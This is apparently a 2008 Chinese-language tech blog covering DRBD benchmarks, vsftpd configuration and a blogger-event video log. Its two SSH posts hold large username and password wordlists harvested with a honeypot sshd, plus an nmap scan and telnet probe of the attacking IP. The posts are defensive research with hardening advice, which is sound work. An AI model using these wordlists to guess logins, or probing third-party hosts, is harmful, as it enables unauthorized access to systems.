Cpu(s): 0.0%us, 5.3%sy, 0.0%ni, 53.0%id, 0.0%wa, 7.2%hi, 34.5%si, 0.0%st
Mem: 516820k total, 36056k used, 480764k free, 368k buffers
Swap: 498004k total, 0k used, 498004k free, 20104k cached

PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
2333 root 16 0 0 0 0 R 69 0.0 1:09.22 drbd0_receiver
2338 root -3 0 0 0 0 S 0 0.0 0:00.56 drbd0_asender
1 root 15 0 1948 648 552 S 0 0.1 0:02.43 init

可以看到在secondary上,
5.3%sy -- System CPU time
7.2%hi -- Hardware IRQ
34.5%si -- Software Interrupts

在1G資料寫入DRBD時,於NODE-B(secondary)上用iptraf觀察eth1的流量
Peak total activity: 623426.88 kbits/s, 76228.80 packets/s
Peak incoming rate: 609721.00 kbits/s, 50648.00 packets/s
Peak outgoing rate: 14150.92 kbits/s, 25580.80 packets/s

在VM Host-Only網卡上面可以跑到500Mbps以上

13.於NODE-A(primary)測試1000個1M小檔寫入速度
先建一個1M小檔
NODE-A:~# dd if=/dev/zero of=/tmp/0 bs=1M count=1
用while loop copy這個1M檔案1000次
NODE-A:~# date ;i=1;while [ $i -le 1000 ] ; do cp /tmp/0 /DRBD/$i; i=$[$i+1]; done;date
Thu Oct 2 23:14:00 CST 2008
Thu Oct 2 23:14:10 CST 2008
由時間戳顯示花了10秒鐘

於NODE-B(secondary)上用iptraf觀察eth1的流量
Peak total activity: 674872.19 kbits/s, 82699.00 packets/s
Peak incoming rate: 659846.19 kbits/s, 54869.80 packets/s
Peak outgoing rate: 15513.48 kbits/s, 27829.20 packets/s

14.把NODE-A設為secondary,讓NODE-B當primary
需要先把NODE-A上面mount的/dev/drbd0 umount
NODE-A:~# umount /DRBD
NODE-A:~# drbdadm secondary r0
在NODE-B上把它設為primary並mount到 /DRBD 目錄
NODE-B:~# drbdadm primary r0
NODE-B:~# mount /dev/drbd0 /DRBD
NODE-B:~# df
Filesystem 1K-blocks Used Available Use% Mounted on
/dev/mapper/VG0-LVROOT
4184064 500296 3683768 12% /
tmpfs 258408 0 258408 0% /lib/init/rw
udev 10240 52 10188 1% /dev
tmpfs 258408 0 258408 0% /dev/shm
/dev/sda1 241116 13240 215428 6% /boot
/dev/drbd0 2086784 1024564 1062220 50% /DRBD

因為是在VM上面測試並非實體機器可能會出現誤差,所以測試結果僅供參考.
DRBD詳細說明文件 http://www.drbd.org/users-guide/users-guide.html

2008-08-04

2008-08-03 Punch Party 6 In BoF 不完全影像紀錄

之所以叫做不完全影像紀錄是因為拍攝過程中原本顯示滿電的副廠電池突然在Xdite主講時掛點..囧rz/當時只好緊急把剛用完的原廠電池現場充電,
所以Xdite的部份只有一開始有影像..!! Sorry.. Xdite ..

凱洛開場


Part 1. 喬敬 - blogger &".blog"


Part 2. Xdite - blogger & 我要成名!
非常抱歉,僅有一開始的部份....


Part 3. KJ - blogger & Wikipedia
萌神KJ.. 最後的射箭照超帥氣



Part 4. 林彥傑 - blogger & 讓台灣319找到國際座標


Part 5. Isaac Mao - blogger & 草莓媒體
礙於兩岸網路的關係,有小部份時間出現LAG情形
part 5-1

part 5-2


Part 6. 無敵小恩恩 - blogger & 他的夏日熱血環島記錄
part 6-1 超熱血,感動..

part 6-2 現場發問..


Part 7. Freddy - blogger & 他的寶貝



Part 8. 朱學恆 - blogger & 阿宅筆記本
part 8-1 強獸人果然名不虛傳.換了投影幕讓我原本架好的三腳架無用武之地,只好緊急換到另一個方向手持拍攝,因為DV舉久了手也是會痠的,所以晃動有點厲害..


part 8-2 最後的主題 每天做一件傻事可以改變世界!

原始影片 Where the Hell is Matt? (2008)

借用asdic在plurk上說的 晚上朱學恆放的那段影片滿感動的,不一定要唸大學、碩士才能寫Blog,不一定要有多專業的知識或經歷才能寫Blog,Blogger們「只要你相信你做得到,你就做得到」,為正在一起努力的Blogger們加油


謝謝凱洛..各位講員....
也辛苦各位工作人員了,帶給我們這麼棒的PP6..
雖然中場休息啤酒沒喝到 XD,但報名費已經值回票價了

另外附上 08-03 凌晨的BOF開場Y!Live截圖
BoF 開場Y!Live截圖集1
capture_03082008_003415


BoF 開場Y!Live截圖集2
capture_20080803012900

BoF 開場Y!Live截圖集3
capture_20080803013753


==================================================
PS:在PP6現場後方低調的出現了剛從電腦應用展結束後過來聽講的
Webi 的Show Girl &總監 Storm,不過好像沒什麼人注意到有Show Girl出現在會場..XD


2008-07-07

[筆記]VSFTPD 建立虛擬用戶與SSL加密 in Debian

安裝 libpam-pwdfile
apt-get install libpam-pwdfile

建立vsftpd_vuser專用的pam service (vsftpd_vusers)
/etc/pam.d/vsftpd_vusers
# Customized login using htpasswd file
auth required pam_pwdfile.so pwdfile /etc/vsftpd/passwd
account required pam_permit.so

利用apache的htpasswd來建立帳號/密碼檔

htpasswd -c /etc/vsftpd/passwd USERA
htpasswd /etc/vsftpd/passwd USERB
chmod 600 /etc/vsftpd/passwd

建立user_list
/etc/vsftpd/user_list
USERA
USERB

建立個別ACCOUNT目錄/權限

/etc/vsftpd/user/USERA
local_root=/PATH/TO/USERA/ACCESS

/etc/vsftpd/user/USERB
local_root=/PATH/TO/USERB/ACCESS
guest_username=REAL_USER_ACCOUNT
local_umask=002

建立SSL key

openssl req -x509 -nodes -days 730 -newkey rsa:1024 -keyout /etc/vsftpd/vsftpd.pem -out /etc/vsftpd/vsftpd.pem

/etc/vsftpd.conf

pasv_min_port=xxxxx
pasv_max_port=yyyyy
listen_port=zz
anonymous_enable=NO
local_enable=YES
write_enable=YES
local_umask=022
userlist_deny=NO
userlist_file=/etc/vsftpd/user_list
chroot_list_enable=YES
chroot_list_file=/etc/vsftpd/user_list
xferlog_enable=YES
dual_log_enable=YES
connect_from_port_20=YES
xferlog_std_format=YES
listen=YES
tcp_wrappers=YES
## VUSER ##
pam_service_name=vsftpd_vusers
user_config_dir=/etc/vsftpd/user
virtual_use_local_privs=YES
guest_enable=YES
secure_chroot_dir=/var/run/vsftpd
hide_ids=YES
## SSL ##
ssl_enable=YES
force_local_data_ssl=no
force_local_logins_ssl=YES
ssl_tlsv1=YES
rsa_cert_file=/etc/vsftpd/vsftpd.pem

2008-05-30

SSH入侵嘗試所使用的密碼蒐集記錄

經過上次 記錄到的一次SSH暴力式嘗試入侵紀錄 之後,
我簡單修改了openssh的CODE,讓他能記錄所有CLIENT端輸進的密碼寫入LOG,同時不允許任何帳號登入.把這個fake sshd 當作一個餌來看能釣到多少ssh worm.
在經過一個禮拜(5/24~5/30)紀錄後的統計結果如下:

發動入侵嘗試IP / 嘗試次數 地理位置(利用www.ip138.com查詢)
117.129.0.111 -- 116
中国移动
123.129.247.32 -- 734 中国山东省 网通
140.134.140.22 -- 16 台灣 逢甲大學
203.198.69.66 -- 392 香港
210.57.230.22 -- 24 韩国
217.167.130.37 -- 69 法国
219.139.190.249 -- 22 中国湖北省襄樊市 电信
222.122.161.12 -- 62 韩国
222.190.109.118 -- 1202 中国江苏省南京市 电信
222.35.136.30 -- 291 中国北京市 铁通
58.211.78.204 -- 6 中国江苏省苏州市 电信
58.61.149.180 -- 424 中国广东省深圳市 电信
59.125.163.62 -- 248 台灣 中華电信
59.180.240.3 -- 16 印度
60.191.123.40 -- 16 中国浙江省杭州市 电信
60.220.248.57 -- 833 中国山西省晋城市 网通
60.250.62.47 -- 9 台灣 中華电信

由目前搜集到的資料可以分析出幾個比較危險的狀態:

1.SSH未改port&不限制root登入.
2.帳號為常見英文名,且密碼相同(必死)
3.密碼過於簡單,以下是簡單歸納出的幾個已知規則
a.一般常見單辭
b.重複數字 (ex: 11111111 , 33333333)
c
.順序數字 (ex: 123 , 1234 , 987654321)
d.順序符號 (ex: !@#$% , !@#$%^&*() , )(*&^%$#@! )
e.鍵盤順序字母(ex: qwerty , asdfgh , 1qaz2wsx3edc4rfv , 3edc4rfv5tgb)
f.簡單文字符號代換(ex: r@@t , p@ssw0rd )

針對sshd的幾點安全建議:

1.可能的話把port改掉,不要用default的TCP/22
2.不要允許root登入(
PermitRootLogin no)
3.若情況允許,使用AllowUsers來設定允許SSH登入帳號的正面表列
4.直接關掉PasswordAuthentication,改用authentication key驗證

以下是由log中整理出來的詳細帳號/密碼資料,
可以嘗試搜看看自己SSH在用的密碼是不是在這份清單裡面..如果是的話..阿彌陀佛囉..

所有嘗試入侵使用的account 共有825個
1 a aaliyah aaron abby abigail absurdir_deadphp adam adi adine adm admin administrator admins admissions adrian aecpro agent ahmed aidan ajith akihisa akino akira alan albert alberto alex alexa alexander alexandra alexandru alexis alfred ali alias alice alin alka allan allen alliance allison almacen alumni alyssa amanda amavisd amber amelia ana andi andrea andreea andrei andres andrew andy angel angela angie anita ann anna anonymous anthony anton apache apple apple1 apples appowner appserver arbaiah arbgirl_phpbb1 areyes arianna armen aron arthur ashley ashlyn asia asterisk atria atsumi audio audrey austin autumn ava avery azuma baba backuppc bailey balykin bandit bane barbara bart basic bauer bear beavis beginner ben benjamin beny bernard bernd bert bessel bill billy bind bird bisson black blog bnc bob bobby bogdan boon boss brandon bret brett brian brianna brooke brooklyn bruce bryan build buster caleb cameron cap carl carlos carly carol caroline carshowguide cassie cesar cgi ch chad chandimal charlott chicago Chicago china chipmast chloe chorist chris Christ christopher cindy cjohnson claire clamav clark client clinic clinton clock closas coco cocolino connor control copier core corinna courier courtney craig cristi cvs cvsuser cyp cyrus cyrusimap dakota Dakota dan dana daniel daniela danielle dank danny dark data dave david db de dean debbie default delta demo denis der design destiny dev devilsins dexter diane dick dima dino director displays doming doodz dovecot download duckie dujoey dust dylan dyndns earl economist ed eddie edgar edward elena elisa eliza elizabeth ella ellen emil emily emma enzo eppc eric erin ernie etc ethan ethereal eugen eva export fabio fabrice factoria faith falcon faridah farrell fauzi fedora felix fester festival file files filip filippid_admin finder first flower fly france francis francois frank franklin fred freeze frei friends ftp ftp123 ftphome ftpuser gabi gabriella gabrielle gary gast gemma generalmanager genoveva george gerry gigi ginger girl godzilla grace gracie gt05 guest guest1 guest10 guest2 guest3 guest4 guest5 guest6 guest7 guest8 guest9 guinness guset gwen hack hacker hailey hallo halt hammer hannah hans harley harris harry harvey hatton hera hermes hiperg http httpd huang huercal hugues ian ident iesse im image india info informix install instrume internet invite ioana ionut iraf iresha isabella isabelle ismail it its jabber jack jackson jacob jacuna jada james japan jasmine jason jatema javi jayden jboss je jean jeff jeffrey jenna jennan jerry jesse jessica jillian jim jimmy jking jnanchito joanna joeflores joerg john johny jonathan jordan Jordan joseph josh joshua Joshua juan judith julia jun junior jupiter justin Justin kaitlyn karika karl kate katherine katie kay kayla kaylee kelly ken kendall kennedy kevin kim kjayroe klog knoppix kor kristen kristin kylie lab lahiru larry lauren laurent laurentiu ldap leah lebedev lee lemancaf_leman library lillian lily linda lindsey linux linuxtest linuxtester linuxtester2 lisa listen liz lloyd logan louise louise1 luc ludovic lyn mackenzie madeline madhuri madison magazine maggie magic mailman makayla malika mama manchester marcus maria mario marissa mark martin martinez marvin mary maryse master math matilda matt matthew maurice max may maya mckenna megan mia michael michaels michal michel michey mickey miguel mihai mike miller mirc molly mom mona monica monique moon morgan mortimer moshutzu mouse movie movies mri murray mustang myra myrhodesiaiscom mysql nadia nagios named natalie nathan neetha netadmin new newsletter newsroom nicholas nick nickelan nicole Nicole noah nokia notused nuucp o2 office oliver olivia operator oracle orange oscar paige paintball paintball1 party pascal pass password patrick paul peewee penelope pete peter petru peyton pgsql phil philip photo physics pico plant plasma poczta pop porno postgres postmaster princess production project pub public purple qtss quincy raider randi ranjith rasika reagan rebecca reboot recruit remote research resin restart retsu rexmen rfmngr richard riley rob robert Robert rock roland rolo ronald root rosa rpm rtorres russ ryan safetp sakura sales samantha samba samir sammy samuel sandra sangley_xmb1 sara sarah sasha savannah save sbear scan scorpion sean search securityagent semenov senaka seoulselection serge server service sgi sham sharon shaun shelby shell shelton shop shuri shutdown sid sierra signalhill simon sirsi skkb sky skylar sll sm sme smmsp snoopy sonny sophia sophie soporte spam spamd spider spike sponsor squid ssh staff stats stella stephanie stephen steve steven stud student students sunny superman support support123 susan sven svn swsoft sya sybase sydney sylvia system tachel tads takada tara taylor ted telnet telnetd temp temporal terry test test1 test10 test11 test12 test123 test2 test3 test4 test5 test6 test7 test8 test9 teste tester testing testuser thaiset theo thomas tigger tim tino tip tmp tokend tom tomas tomcat tomcat5 tone tony toto tracker transfer trash travel_phpb1 trinity ts tweety tyler ubuntu ueda ultra unix unknown updates user user1 user123 username users valas valentin valerie vanesa vanessa vdi venom ventas vermont vic vicky victoria video vincent viorel viper virginia virus visitor vivek vmware vnc vwalker walker wallimo_phpbb1 walter wang wanker web webadmin webcam webmaster webpop wei white wilkins will wille william williamson willie win windowserver wolfgang workshop wrestling www www1 wwwdata wwwrun xbox xgridagent xgridcontroller xtra xxx zachary zena zimbra zoe

所有登入嘗試使用過的密碼有2038組

! !@ !@# !@#$ !@#$% !@#$%^ !@#$%^" !@#$%^& !@#$%^&* !@#$%^&*( !@#$%^&*()))()(*)(*&)(*&^)(*&^%)(*&^%$)(*&^%$#)(*&^%$#@)(*&^%$#@! @#$%^& * 0 0000 00000 000000 0000000 00000000 000000000 0007 007 007007 0246 0249 030876 0727 09 098 0987 09876 098765 0987654 09876543 098765432 0987654321 0o9i8u7y 0ok9ij 0plmnko9 1 10101010 1022 10sne1 11 111 1111 11111 111111 1111111 11111111 111111111 111111111111 112233 12 121212 1225 123 123123 12321 123321 1234 12345 123456 1234567 12345678 123456789 1234567890 12345678910 123456789\303 12345x 1234qwer 123abc 123go 123listen123 123listen321 123nuucp123 123nuucp321 123qwe 123root123 123www 1313 131313 13579 14430 1701d 1928 1951 19850828 1985this1is2not3my4real5password61985 1a2b3c 1a2b3c4d 1a2s3d4f 1p2o3i 1q2w3e 1q2w3e4r 1q2w3e4r5t 1qa2ws 1qa2ws3ed 1qaz2wsx 1qaz2wsx3edc 1qaz2wsx3edc4rfv 1qw23e 1qwe23 1sanjose 1tset 1z2x3c4v 2007 2008 21 2112 21122112 2222 22222 222222 2222222 22222222 222222222222 24021988 2514953 2borNOT2b 2welcome 2wsx3edc 31337 31338 321 321tset 33 333 3333 33333 333333 3333333 33333333 369 3edc4rfv5tgb 4321 4444 444444 4444444 44444444 4runner 5252 54321 5555 555555 5555555 55555555 5683 5tgb6yhn 5tgb6yhn#P 654321 654321tset 666666 6666666 66666666 666s1czfarginn 6969 7654321 777 7777 777777 7777777 77777777 7yhn 80486 8675309; 87654321 888888 8888888 88888888 90210 911 92072 987654321 999999 9999999 99999999 a a1s2d3 aaa aaaa aaaaaa aaliyah aaron123 abby abc abc123 abcd1234 abcde abcdef abcdefg abcdefgh abcdefghi abigail abys action ad adam adam123 adept adi adi123 adidas adine adine123 adm admi admin admin01 admin02 admin1 admin123 admin12345 admin2 adminadmin administrator administrator1 administrator123 adminlinux adminroot admins admissions adrian adrian123 aecpro aecpro123 agent ahmed ahmed123 aidan airhead ajith akihisa akino akira alan alaska albert albert123 alberto alex alex123 alexa alexander alexandra alexandru alexandru123 alexis alfred alfred1 alfred123 ali ali123 alias alice alice123 alin alin123 alka alka123 allan allan123 allen alliance allison almacen almacen123 alumni alumni1 alyssa amanda amanda1 amanda123 amavisd amber amelia america america1 americaonline ana andi andi123 andrea andreea andreea123 andrei andrei123 andres andres123 andrew andrew123 andy andy123 angel angel123 angela angela123 angie angie123 anita anita123 ann ann123 anna anna123 anonymous anonymous123 anthony anthony123 antivirus anton anton123 apache apache123 apple apple1 apple123 apples apples123 appowner appserver aqswde arbaiah arbaiah123 areyes areyes123 arianna armen aron aron123 arthur arthur123 asd asdf asdfdsggsg asdfgh asdfghjkl ashley ashley1 ashley123 ashlyn asia aslpls aslpls123 atena athena atria atsumi attack audio audrey austin austin123 autumn ava avery away axgt14ie azsxdcfv azuma b baba back backdoor backup backup123 backuppc bailey balykin bandit bandit1 bandit123 bandwitch bane banner barbara barbara123 bart bart123 base bash basic basket basketball bastard bathory bauer beach bear bear123 beast beavis beavis123 beginner beginner123 beliver bella ben ben123 benjamin beny beny123 bernard bernard123 bernd bert bert123 bessel best bhunjimkolp bill bill123 billy billy123 bin bind bind123 bird bird123 birth bisson bitch black black123 blast blink2112 blog blue bnc bob bob123 bobby bobby123 bogdan bogdan123 book boon boon123 boss bosto bostoaca bostocel bounce brandon break bret bret123 brett brian brian123 brianna britney brooke brooklyn bruce bruce123 bryan bryan123 bucharest build buster buster123 buton byte c caleb cameron canada cap carl carl123 carlos carly carmen carol carol123 caroline carshowguide carshowguide123 cassie cassie123 cause cdrom cecile cesar cesar123 cesar1234 cgi ch chad chandimal changeme charlott charlott123 chicago chicago123 chick china chipmast chipmast123 chloe chorist chris chris123 christmas christopher cicciabuatta1 cindy city cjohnson claire clamav clan clark clark123 classic claudia client client1 clinic clinton clinton123 clock clock123 closas coco cocolino code coder colin collins com commander compact company compas compile computer confussion connect connection connor control control123 cool copier core corinna corinna123 counter courier courtney cover cradle craig craig123 cream cristi cristi123 crying cstrike cuba cvs cvs123 cvsuser cvsuser1 cycle cyp cyp123 cyrus cyrus123 cyrusimap d daemon dakota dakota123 dan dan123 dana dana123 dance daniel daniel123 daniela daniela123 danielle dank danny danny123 dark darwin data date dave dave123 david david123 db db123 de dean deathfromromaniansecurityteamneversleepba debbie debian debug default delta demo denis der design desire desktop destiny dev dev123 devilsins dexter dexter123 diablo diane dick dick123 dima dimension dino dino1 dinosaur dinozaur director displays document doming doming123 domino doodz door dovecot down download dream dreamer dreamfish007 dreamweaver drink drunk duckie duckie123 dujoey dujoey123 dust dust123 dylan dylan123 dyndns e E5efEHW65 eadmin earl earl123 economist ed ed123 eddie eddie123 edgar edgar123 educational edward edward123 elena elena123 elisa elise eliza elizabeth elizabeth1 ella ellen ellen123 email emil emil123 emily eminem emma england english enterprise enzo enzo123 eppc eric eric123 erin ernie etc ethan ethereal ethereal123 eugen eugen123 europe eva eva123 ever execute exotic expert exploit export f fabio fabrice factoria fagaras faith falcon faridah faridah123 farrell father fauzi fauzi123 FD6d95oE fedora feel felix felix123 fester festival fff fft_dbkbb_020103 fifa file files filip filip123 finder finish firebird firefox first fish flood floppy flower flower123 fly flyer football formula found four foxythekid france francis francis123 francois francois123 frank frank123 franklin franklin123 freak fred fred123 free freeze frei friday friends friends123 ftp ftphome ftphome123 ftpuser future fv11r01rc3@l g gabi gabi123 gabriella gabrielle game gamer games gary gary123 gast gast1 gast123 gemma gemma123 generalmanager genoveva gentelman george george123 germany gerry gforce ghost gigi ginger ginger123 girl girl123 girlfriend gjrhjd global gnats gnitset godlike godzilla godzilla123 Goethe6750 gold gotit governemnt grace gracie gt05 guest guest1 guest10 guest123 guest1234 guest2 guest2123 guest3 guest4 guest5 guest6 guest7 guest8 guest9 guestaccount guinness guinness123 gwen gwen123 h hack hack123 hackbox hacker hacker123 hacking hackteam hailey halflife half-life halflife2 hallo halloween halt hammer hammer123 hamster hankkim hannah hans hard hardcore harddisk hardrock harley harley123 harris harris123 harry harry123 harvey hatton hatton123 hell hello help helpme hera hera123 hermes hidden hill2700 hiperg hiperg123 hiphop hole home homework hood host hostname hotmail http HTTP http123 httpd httpd123 huang huercal hugues hyper i I7IVCOivaV ian ian123 id ident identd iesse123 ifeelgood iloveyou im image india infinit info info123 informix install instrume instrume123 inter internet internet123 inuxrulz invite ioana ioana123 ionut ionut123 iraf irc ircop iresha isabella isabelle isabelle123 ismail ismail123 it its iwantyou j jabber jack jack123 jackass jackson jacob jada JagGolUie-720 james james123 japan jasmine jason jatema javi jayden jboss jdhk je jean jeff jeff123 jeffrey jeffrey123 jenna jennan jerry jerry123 jesse jessica jillian jim jim123 jimmy jimmy123 jking jking123 jnanchito joanna joanna123 joeflores joeflores123 joerg joerg123 john john123 johny johny123 jonathan jordan Jordan jordan1 jordan123 joseph josh joshua joshua123 jrimla5225 juan judith julia jun junior junior1 jupiter jupiter123 justin justin123 k kaitlyn kaptain karika karika123 karl karl123 kate katherine katie kay kay123 kayla kayla123 kaylee kelly ken ken123 kendall kennedy kermit kevin kevin123 kiddie kill killer kim kim123 kitty kjayroe kjayroe123 klog knoppix koala kor kristen kristen123 kristin kristin123 kx028897chebeuname+a kyle kylie l L0f4sz l7q1smpp lab lady lahiru language larry larry123 last laura1981 lauren laurent laurentiu laurentiu123 lazarus ldap leah lebedev lee lee123 letmein level library lick lillian lily linda lindows lindsey linkinpark linrex413 linux linux123 linuxtest linuxtester linuxtester2 lisa lisa123 list listen listen0 listen01 listen02 listen1 listen10 listen12 listen123 listen1234 listen12345 listen123456 listen2 listen21 listen3 listen321 listen4 listen4321 listen5 listen54321 listen654321 listen9 listenistrator listenlisten listens liz liz1 liz123 lkjhgfdsa lloyd lloyd123 local localhost logan login logon longman lost louise louise1 lover loveyou lp lsdfjafaf luc ludovic lyn m mackenzie macos madeline madhuri madison madison123 mafutincur magazine maggie magic magic123 magician mail mail123 mailman makayla malika mama manager manchester mandrake manifest marcus maria maria123 marie mario mario123 marissa mark mark123 markus martin martin1 martin123 martinez martinez123 marvin marvin123 mary maryse maryse1 master master123 math matilda matilda123 matt matt123 matt2006 matt2007 matthew matthew123 maurice maurice123 max max123 maxim may maya mckenna media megabyte megan metal mia mia123 mice michael michael12 michael123 michaels michal michel michele michey123 mickey miguel mihai mihai123 mike mike123 mike20 miller miller123 mirc mirc123 mnbvcxz molly molly123 mom mom123 mona monica monica123 monique monique123 monitor month moon moon123 morgan mortimer mortimer123 mother mouse mouse123 movie movies mozilla mri mri123 muffin muhahaha muiemare murphy murray mustang mustang123 myra myra123 mysql mysql123 n nadia nagios nagios1 name named namenuucp nasa NASA natalie nathan nathan123 nba2005 neetha negotino negotino1 negotino2 neptune net netadmin netadmin123 netware network nevada neverland new news news123 newsletter newsroom newyork next nicholas nick nick1 nickelan nicole nicole123 nigga night nighwish nimda noah nobody nobody123 noise nokia nologin notepad notused notused123 novice nowone nuke nuklear numb nuucp nuucp0 nuucp01 nuucp02 nuucp1 nuucp10 nuucp12 nuucp123 nuucp1234 nuucp12345 nuucp123456 nuucp2 nuucp21 nuucp3 nuucp321 nuucp4 nuucp4321 nuucp5 nuucp54321 nuucp654321 nuucp9 nuucpistrator nuucpnuucp nuucps nuucpx o o2 o2123 o9q1w2e3i8u7 office olga1234 oliver olivia openssh opera operator oracle oracle1 oracle123 oracle1234 oracle9i oracleoracle orange orange123 oscar owner ozzy p pa55w0rd pa55word paige paintball paintball1 paintball123 pamela paradise park parola parolanoua party pascal pascal123 pass pass1 pass12 pass123 pass1234 passw0rd passwd password password1 password12 password123 password1234 passwordx past patricia patrick patrick123 paul paul123 pa$$word paypal peewee peewee123 penelopa penelope penelope123 people perfect personal pete pete123 peter peter123 petru petru123 peyton pgsql pgsql123 pheonix phil phil123 philip philip123 photo physics pico pink place plant plasma player playstation plutonium pm7khapd poczta poiuytrewq polamea poor pop porno porno123 postfix postgres postgres1234 postmaster power present princess princess123 production program project project1 protocol p@ssw0rd p@ssword psycho pub public pulamea punish9899 purple purple123 putty Pwnh6SJCFxn1 q q1w2e3 q1w2e3r4 q1w2e3r4t5y6 q2w3e4r5 qawsed qaz qazwsxedc qazwsxedcrfvtgbyhnum qpoeiruty qpwoeiruty qsxesz qtss quincy quincy123 qwe qwe123 qwer1234 qwert qwerty qwerty123 qwertyuiop r r00t r0ot rabbit rachel radiation radio raider randi ranjith rase rasika raul reagan rebecca reboot reborn recruit redalert reddog redhat redlight register rehash relay release reload remember remote replace replay research resin restart restore resu retea retset revenge revenger revision rexmen $rfmngr$ rich richard richard123 riley ro0t rob rob123 robby robert robert123 roberta rock rock123 roland roland123 rolo rolo123 romania ron123 ronald ronald123 rooot root root! root!@# root!@#$ root# rOOt root1 root12 root123 root1234 root12345 root123456 root1234567 root12345678 root123456789 root2000 rootabc rootadmin rootlisten rootnuucp rootpass rootroot rootrootroot rootuser rosa rosa123 rose rosemarie router rpm r@@t rtorres russ russ123 russia rustic rusty ryan s sadness safetp sakura sales samantha samba samba123 same samir samir123 sammy sammy123 samuel samuel123 sandra sandra123 sara sarah sarah123 sasha satan saturday saturn savafr3kingat savannah save save123 sbear scan scan123 scanner scar scary school scipter scorpion scorpion123 scricideea script sean sean123 search secret secure security securityagent semenov semenov123 senaka send sending seoulselection seoulselection123 serge server server1 service sexy sgi shadow sham sham123 shark sharon shaun shaun123 shelby shell shell123 shelton shop shop123 shuri shutdown sid sierra signalhill signalhill123 silver simion simon simon123 sirsi sixsixsix skkb skkb123 sky skylar slackware slayer sll sll123 slow sm sm123 sme sme123 smmsp Snake sniper snoopy snoopy1 snoopy123 sobysoricelu soft soigan soleil soniq sonny sonny123 sophia sophie soporte sorry sound spam spam123 spamd spider spider123 spiderman SpiderMan spike spike123 sponsor squid srlre+pbgf ssh ssh22 sshd sshd123 staff stage start startup starwars state states States stats status stella stephanie stephanie123 stephen stephen123 steve steve123 stevem steven steven123 stevie stop strange strech stud student students style summer summer2 sun123 sunday sunny sunos super superguy superman superman123 superroot support123 susan sven sven123 svn swdefr swsoft sya sya123 sybase sybase123 sydney sylvia sylvia123 sync sysadmin sysguest syslisten sysmail sysnuucp sysroot system system123 systest sysuser t tads tads123 tads123456 taiwan takada tara tara123 taskbar taylor team ted telnet telnetd temp temp1 temp123 temporal terminator terry test test1 test10 test11 test12 test123 test1234 test12345 test123456 test2 test3 test321 test4 test5 test6 test654321 test7 test8 test9 teste tester tester1 tester12 tester123 tester1234 testing testing1 testing12 testing123 testing1234 tests testtest testuser thaiset thaiset123 the1 thebest theo theo123 therion thomas thomas123 tigger tigger123 tim tim123 tino tino123 tip tip123 tmp tmp123 tneduts tokend tom tom123 tomas tomcat tomcat123 tomcat123456 tomcat5 tone tony tony123 toor toto tracker trambuline transfer trapper trash trash123 trinity trojan ts tset tseug tweety tweety123 tyler u ubuntu ueda ukJ33W_QoO ultra ultra123 united unix unixbitch unknown update updates uptime user user123 username userroot users uucp v valentin valentin123 valerie valerie123 vanesa123 Vanessa vdi vdi123 ven0m venom venom123 ventas ventas123 vermont vermont123 vic vicky vicky123 victoria video video1 vincent viorel viorel123 viper viper123 virginia virginia123 virus visitor vivek vmware vnc vwalker w3lc0m3 waine walker walking walter walter123 wang wang123 wanker wanker123 web web123 webadmin webcam webmaster webmaster123 webpop webpop123 wei welcome welcome1 white white123 wick wicked wilkins will will123 william williamsburg williamson willie willie123 win win123 winamp windows windowserver winrar wish witch wolfgang work workshop wrestling write wsx wsxedcrfvtgb www www1 www123 wwwdata www-data wwwdata123 wwwrun x x12345 x1x2x3 xbox xgridagent xgridcontroller xqks lej xsw xtra xtra123 xxx xxx1 xxx123 xxxx xxxxx xxxxxx xxxxxxx y yahoo yankees year yellow YgqxUVOkly you yPWM5LHGAh z zachary zaq zdxfcgvh zena zena123 zero zidane zimbra zoe zoro zsexdrcft zxcvbnm

2008-05-23

記錄到的一次SSH暴力式嘗試入侵紀錄

在2008-5-23下午突然想做個試驗,把一台虛擬機(VM)掛上public IP,然後把ssh-server的port TCP/22對外開起來,看看經過多久會有人來TRY.
(個人習慣系統裝完我會把SSH的 TCP/22改掉,改成很後面的PORT,如果有人要掃port就讓他慢慢掃)
結果不到6小時就逮到一個嘗試入侵的IP了
記錄到的LOG如下
May 23 19:52:06 __ sshd[3515]: Did not receive identification string from 59.125.163.62
19:52:06第一個封包來測試TCP/22是否開啟
May 23 20:12:36 __ sshd[3521]: User root from 59-125-163-62.hinet-ip.hinet.net not allowed because not listed in AllowUsers
May 23 20:12:36 __ sshd[3521]: (pam_unix) authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=59-125-163-62.hinet-ip.hinet.net user=root
May 23 20:12:38 __ sshd[3521]: Failed password for invalid user root from 59.125.163.62 port 33779 ssh2
接下來 20:12:36開始用root帳號try密碼,try了120次.
之後又用其他帳號來try了244次,一直到20:38:52才結束整個嘗試密碼的行為
整個嘗試帳號的統計如下
root 120次 lady 4次 anca 2次 dana 2次 personal 2次 radu 2次
剩下都是一次的帳號
abc ace adela adi adrian adv alex alexandru alias alina amar ambulator ancutza andrew annuaire anonymous antica arthur atb aurelia avenues awstats axente beleaua bogdan bremar bula calcul calin callhome cdvonline cerasela chimi chuck cimpeanu ciprian claudia claudiu claudius cncp contabil contat contempo corbus cosinus courier cris crisan cristi cristina cs dan daniel daniela danutza darkman dascalu david diabet dispecer dnp doina doomi dorin dorina drweb duane echopedi eddie emuleon eric erin ernest eugen eva exim fabrice farmacia felix filter fish florin fluffy folkert foobar fotograf garda gold gratiela greg guma haitac healer horia hostmaster httpd ina ionita ionut ionutz Ionutz ircd isabel iuli iulian iuly java jeffrey jeni jubar jurca juridic kent klaus laura lauren lead leu liana lili lorant loredana loverd lucia lucky mada mari maria marius mark master mckey medie medina Melk mia miha mihai moderna moised monika monique mysql nelu nick nico nicoara nicu norby notorius nucleara numis officeinn oprea oracle ovidiu palex passwd paul preist promo public quake raducu raul razvan revista richer robert rodica rodney romeo roxi ryan saito samba sanda sanderson sarolta sasha sauv save seba sebestyen secretar seongjin shadow simina sin skid slayer sly sorin spik sport squirrelmail staff statistica stefan styx sun support susan taz tehnolog telegest temp teo testguy tina tomcat toor tordai toto town trash trigger tuningar vasi victor water webadmin webmasters webrun webster whitecanyon wolf x xman yarul zako zemba

(可惜沒去修改sshd來記錄他嚐試過的密碼,哪天再來改sshd的code來玩玩好了)

用NMAP來掃了一下 59.125.163.62這台機器,
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
554/tcp open rtsp
904/tcp open unknown =>VMware Authentication Daemon
5901/tcp open vnc-1
10000/tcp open snet-sensor-mgmt =>WEBMIN =_=
看來沒作啥特別防護....=_=

# telnet 59.125.163.62 904
Trying 59.125.163.62...
